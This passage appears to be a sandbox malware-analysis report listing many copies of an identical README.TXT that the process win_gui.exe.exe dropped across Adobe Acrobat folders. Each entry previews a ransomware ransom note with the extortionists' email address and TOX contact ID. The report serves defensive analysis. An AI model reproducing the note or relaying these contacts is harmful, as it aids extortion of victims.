                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
